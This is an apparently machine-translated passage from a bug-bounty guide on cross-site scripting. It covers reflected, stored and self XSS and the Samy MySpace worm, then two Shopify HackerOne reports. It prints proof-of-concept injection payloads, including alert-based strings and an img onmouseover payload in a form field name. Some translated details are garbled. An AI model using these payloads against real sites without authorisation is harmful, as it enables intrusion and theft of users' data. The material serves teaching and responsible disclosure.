alert('XSS');

This will create Javascript function alert and will create a simple (and harmless) window with the letters XSS. IN previous versions book, I recommended that you use this example when writing reports. That is, until one extremely successful hacker told me that it was a “horrible example,” explaining that the recipient of a vulnerability report might not realize the severity of the problem and, because the example was harmless, would pay out a small reward.

So, use this example to detect an XSS vulnerability, but when writing the report, think about the potential harm that the vulnerability could cause and explain it. By this I don't mean telling the company what XSS is, but rather explaining what you can achieve by exploiting the vulnerability and how it could specifically impact their site.

There are three different types of XSS that you may hear about while researching and reporting:

Reflective XSS: These attacks are not stored on the site, meaning the XSS is generated and executed in a single request and response.
Stored XSS: These attacks are stored on the site and are often more dangerous. They are stored on the server and executed on “normal” pages by unsuspecting users.
Self XSS: These attacks are also not stored on the site and are usually used as part of tricking a person into running XSS themselves. When you look for vulnerabilities, you will find that companies often don't care about eliminating Self XSS, they only care about cases where harm to their users may not be done by themselves, but by someone else, as is the case with Reflective and Stored XSS. However, this does not mean that you should not look for Self XSS.

If you find a situation where Self XSS can be executed but not saved, think about how this vulnerability could be exploited, can you use it in combination with something so that it is no longer Self XSS?

One of the most famous examples of using XSS is MySpace Samy Work by Samy Kamkar. In October 2005, Sami exploited a stored XSS vulnerability in MySpace, which allowed him to upload Javascript code that was executed every time someone visited his MySpace page, adding the page visitor as a friend of Sami's profile. Moreover, the code also copied itself to the pages of Samy's new friends so that the profiles of his new friends were updated with the following text: “but most of all, samy is my hero.”

Although Sami's example was relatively harmless, using XSS allows one to steal logins, passwords, banking information, and so on. Despite the potential harm, fixing XSS vulnerabilities is generally not difficult and requires developers to simply escape user input (just like HTML injection) when rendering it. Although, some sites also remove potentially malicious characters when the hacker sends them.

1. Shopify Sale

Difficulty: Low
Url: wholesale.shopify.com
Report link: https://hackerone.com/reports/10629326 Report date: December 21, 2015
Reward Paid: $500
Description:

The Shopify27 sale site is a simple page with a direct call to action - enter the product name and click “Find Products”. Here's a screenshot:

Screenshot of the wholesale sales site

The XSS vulnerability here was the simplest one you can find - the text entered into the search bar was not escaped, so any Javascript entered was executed. Here is the sent text from the vulnerability description: test’;alert(‘XSS’);’

The reason this worked is because Shopify took user input, executed the search query, and if there were no results, printed a message saying there were no search results for the search term entered, showing the unescaped user input on the page. As a result, the submitted Javascript was rendered on the page and browsers interpreted it as executable Javascript.

Conclusions

Test everything, paying special attention to situations where the entered text is rendered on the page. Check to see if you can include HTML or Javascript in your input and see how the site processes it. Also try encoding the input similar to what is described in the chapter on HTML injections.

XSS vulnerabilities don't have to be complex or confusing. This vulnerability was the simplest one imaginable - a simple text input field that does not process user input. And it was discovered on December 21, 2015, and brought the hacker $500! All it took was hacker thinking.

2. Cart gift cards Shopify

Difficulty: Low
Url: hardware.shopify.com/cart
Report link: https://hackerone.com/reports/9508928 Report date: October 21, 2015
Reward Paid: $500
Description:

The Shopify29 gift card store website allows users to create their own gift card designs using an HTML form that includes a file upload box, a few lines for text entry for details, and so on. Here's a screenshot:

Screenshot of Shopify gift card store form

The XSS vulnerability here was triggered when Javascript was entered into the form field intended for the image title. This is quite easy to do using HTML proxies, which we will talk about later in the “Tools” chapter. So the original form submission included:

Content - Disposition : form - data ; name = "properties [Artwor 2 k file]"

It could be intercepted and changed to:

Content - Disposition : form - data ; name = ”properties [ Artwor 2 k file< img src = ’test ’onmouseover = ’alert (2 ) ’> ] ”;

Conclusions

There are two things to note here that will help detect XSS vulnerabilities:

The vulnerability in this case was not directly in the file upload field itself - it was in the field name. So when you're looking to apply XSS, don't forget to play around with all the available field values.

The specified value was sent after it was modified by a proxy. This is important in situations where values are validated on the client side (in your browser) before being sent to the server.

In fact, any time you see live validation running in your browser, it should be a red flag to test that field! Developers can make mistakes by not validating submitted values for malicious code on the server because they hope that the browser's Javascript validation has already done the checking.

Editor's Choice